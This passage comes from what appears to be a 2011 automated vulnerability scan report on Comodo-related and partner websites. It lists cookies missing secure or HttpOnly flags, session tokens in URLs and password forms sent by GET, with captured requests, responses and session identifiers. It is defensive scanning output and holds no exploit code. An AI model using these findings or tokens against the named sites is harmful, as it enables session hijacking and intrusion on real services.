Set-Cookie: JSESSIONID=c4b411f07d6c067b98ce9194a5ae; Path=/PCICS
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...

3.7. https://www.panopticsecurity.com/PCICS/PanController/doInitUser

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doInitUser

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PCICS/PanController/doInitUser?partner=Comodo&path=Enter+ExpertPCI HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c483ef1a943db8e1f27035ee8e5c

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 18 Sep 2011 11:28:59 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1 Java/Sun Microsystems Inc./1.6)
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Location: http://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 224
Set-Cookie: JSESSIONID=c48a63af3a1fe42b1ac75b96be64; Path=/PCICS
Connection: close

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo">here</a>
...[SNIP]...

4. Session token in URL
There are 7 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://efaxcorporate.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://efaxcorporate.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- BEGIN HumanTag Monitor and LiveEngage. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG -->
<script language="javascript" src="https://server.iad.liveperson.net/hc/62672927/x.js?SESSIONVAR!origin=efaxCorporatesales&cmd=file&file=chatScript3&site=62672927&imageUrl=https://a248.e.akamai.net/7/248/528/001/images.j2.com/chatEfaxCorp/">//</script>
...[SNIP]...

4.2. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://efaxcorporate.com
Path:   /solutions/Compatibility/Industry-Compatibility

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /solutions/Compatibility/Industry-Compatibility HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://efaxcorporate.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; brand=efaxcorp; __g_c=w%3A1%7Cb%3A2; mbox=check#true#1316366487|session#1316366426074-552683#1316368287; s_cc=true; s_ev4=%5B%5B%27home.j2.com%27%2C%271316366426332%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316366426333%27%5D%5D; j2CampaignTracking=; __utma=110028753.680056721.1316366426.1316366426.1316366426.1; __utmb=110028753.1.10.1316366426; __utmc=110028753; __utmz=110028753.1316366426.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; c_m=undefinedhome.j2.comhome.j2.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...
<!-- BEGIN HumanTag Monitor and LiveEngage. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG -->
<script language="javascript" src="https://server.iad.liveperson.net/hc/62672927/x.js?SESSIONVAR!origin=efaxCorporatesales&cmd=file&file=chatScript3&site=62672927&imageUrl=https://a248.e.akamai.net/7/248/528/001/images.j2.com/chatEfaxCorp/">//</script>
...[SNIP]...

4.3. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://j2global.tt.omtrdc.net
Path:   /m2/j2global/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/j2global/mbox/standard?mboxHost=www.trustfax.com&mboxSession=1316364084200-226831&mboxPage=1316364084200-226831&screenHeight=1200&screenWidth=1920&browserWidth=1097&browserHeight=869&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=TF_xs_adClick_globalfooter&mboxId=0&mboxTime=1316346084298&mboxURL=http%3A%2F%2Fwww.trustfax.com%2F&mboxReferrer=http%3A%2F%2Fwww.vengine.com%2Fproducts%2Fprove_it.html&mboxVersion=39 HTTP/1.1
Host: j2global.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 181
Date: Sun, 18 Sep 2011 11:40:19 GMT
Server: Test & Target

mboxFactories.get('default').get('TF_xs_adClick_globalfooter',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316364084200-226831.19");

4.4. https://secure.comodo.com/ev/faq.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.comodo.com
Path:   /ev/faq.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ev/faq.html HTTP/1.1
Host: secure.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:31:04 GMT
Content-Type: text/html
Content-Length: 14655
Last-Modified: Wed, 03 Feb 2010 20:10:06 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<li><a id="_lpChatBtn" href='http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&byhref=1&SESSIONVAR!skill=Sales&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a' target='chat61298727' onClick="javascript:window.open('http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&SESSIONVAR!skill=Sales&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a&referrer='+escape(document.location),'chat61298727','width=475,height=400,resizable=yes');return false;">Chat with an EV SSL Specialist Now</a>
...[SNIP]...

4.5. https://secure.comodo.com/geekbuddy/create-account.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.comodo.com
Path:   /geekbuddy/create-account.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /geekbuddy/create-account.php HTTP/1.1
Host: secure.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:31:06 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 33647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td colspan="2" class="terms_cond">Need help with Billing or with Registration? ... <a rel="nofollow" href="http://server.iad.liveperson.net/hc/61298727/?cmd=file&amp;file=visitorWantsToChat&amp;site=61298727&amp;byhref=1&amp;SESSIONVAR!skill=CFP%20PRO%20PLUS&amp;imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a" onclick="javascript:pageTracker._trackPageview('/outbound/order-index/form/text/server.iad.liveperson.net'); javascript:window.open('http://server.iad.liveperson.net/hc/61298727/?cmd=file&amp;file=visitorWantsToChat&amp;site=61298727&amp;byhref=1&amp;SESSIONVAR!skill=CFP%20PRO%20PLUS&amp;imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a','chat','width=475,height=400,resizable=yes');return false;" class="blue_link">Chat Now</a>
...[SNIP]...
<span><a rel="nofollow" href="http://server.iad.liveperson.net/hc/61298727/?cmd=file&amp;file=visitorWantsToChat&amp;site=61298727&amp;byhref=1&amp;SESSIONVAR!skill=CFP%20PRO%20PLUS&amp;imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a" onclick="javascript:pageTracker._trackPageview('/outbound/order-index/footer/text/server.iad.liveperson.net'); javascript:window.open('http://server.iad.liveperson.net/hc/61298727/?cmd=file&amp;file=visitorWantsToChat&amp;site=61298727&amp;byhref=1&amp;SESSIONVAR!skill=CFP%20PRO%20PLUS&amp;imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a','chat','width=475,height=400,resizable=yes');return false;" title="Member Chat">Member Chat</a>
...[SNIP]...

4.6. http://server.iad.liveperson.net/hc/61298727/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://server.iad.liveperson.net
Path:   /hc/61298727/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/61298727/?visitor=&msessionkey=&site=61298727&cmd=startPage&page=http%3A//www.instantssl.com/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=125749232&scriptVersion=1.1&d=1316328667529&&SESSIONVAR!skill=Sales&scriptType=SERVERBASED&title=SSL%20Certificate%20From%20Comodo%u2122%20with%20Free%20SSL%20Certificates%20and%20Server%20Certificates%20%u2013%20Digital%20Certificate%20Authority&referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcomodo HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5094376206423575644; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316310598891

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:50:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_61298727=STANDALONE; path=/hc/61298727
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89aP............,...........L.;

4.7. http://www.enterprisessl.com/ssl-certificate-products/evssl/ssl-certificate-search.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.enterprisessl.com
Path:   /ssl-certificate-products/evssl/ssl-certificate-search.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ssl-certificate-products/evssl/ssl-certificate-search.html HTTP/1.1
Host: www.enterprisessl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:47 GMT
Content-Type: text/html
Content-Length: 18664
Last-Modified: Wed, 20 Oct 2010 18:25:04 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Business En
...[SNIP]...
<li><a href="http://icrs.informe.org/nei-sos-icrs/ICRS;jsessionid=B2AC095946D5DEAD874571E37C7C8D3B?MainPage=x" onclick="return popitup('http://icrs.informe.org/nei-sos-icrs/ICRS;jsessionid=B2AC095946D5DEAD874571E37C7C8D3B?MainPage=x')">Maine Corporation Search</a>
...[SNIP]...

5. Password field submitted using GET method
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


5.1. http://www.contentverification.com/confidence_pak-buy.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /confidence_pak-buy.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /confidence_pak-buy.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/confidence_pak.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:00:00 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 7751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Conte
...[SNIP]...
</ul>
<form name="formN" method="GET" action="https://secure.comodo.com/products/!placeOrder" onSubmit="return valid()">
<input type="hidden" name="currency" />
...[SNIP]...
</strong>
<input type="password" name="loginPassword" value="" /></p>
...[SNIP]...

5.2. http://www.contentverification.com/logos/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/index.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /logos/index.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:04 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 26684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
</h1>
<form name="logo" method="GET" action="https://secure.comodo.com/products/!placeOrder" onSubmit="return valid()">
<input type="hidden" name="ap" value="contentverification.com" />
...[SNIP]...
<td><input type="password" name="loginPassword" value="" /></td>
...[SNIP]...

6. Cookie without HttpOnly flag set
There are 15 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://efaxcorporate.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://efaxcorporate.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

6.2. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility

Summary

Severity:   Low
Confidence:   Firm
Host:   http://efaxcorporate.com
Path:   /solutions/Compatibility/Industry-Compatibility

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/Compatibility/Industry-Compatibility HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://efaxcorporate.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; brand=efaxcorp; __g_c=w%3A1%7Cb%3A2; mbox=check#true#1316366487|session#1316366426074-552683#1316368287; s_cc=true; s_ev4=%5B%5B%27home.j2.com%27%2C%271316366426332%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316366426333%27%5D%5D; j2CampaignTracking=; __utma=110028753.680056721.1316366426.1316366426.1316366426.1; __utmb=110028753.1.10.1316366426; __utmc=110028753; __utmz=110028753.1316366426.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; c_m=undefinedhome.j2.comhome.j2.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...

6.3. http://efaxdeveloper.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://efaxdeveloper.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxdeveloper.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:24 GMT
Server: Apache
Vary: Host,Accept-Encoding
Cache-Control: max-age=43200, public
Pragma:
Content-Length: 16094
Expires: Mon, 19 Sep 2011 00:19:24 GMT
Last-Modified: Sun, 18 Sep 2011 10:26:52 GMT
X-Magnolia-Registration: Registered
Set-Cookie: CMS_JSESSIONID=V5c6T1hMnXsnxsT6n2c2DJTWHR5SLJG8fngF7dvLv0h2TyrWDBlv!-1356397028; path=/
Set-Cookie: lang=en; domain=efaxdeveloper.com; expires=Wednesday, 02-Nov-2011 12:19:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
X-TWA-Web: pb:28032
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<div s
...[SNIP]...

6.4. http://www.govinfosecurity.com/articles.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.govinfosecurity.com
Path:   /articles.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /articles.php HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Set-Cookie: isPopUpDone=1; expires=Sun, 18-Sep-2011 11:11:23 GMT; domain=.govinfosecurity.com
Connection: close
Content-Type: text/html
Content-Length: 121213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

6.5. https://www.panopticsecurity.com/Comodo/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /Comodo/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Comodo/index.jsp?partner=Comodo HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://hackerguardian.com/hackerguardian/qa_sa_wizard.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.panopticsecurity.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:23:21 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
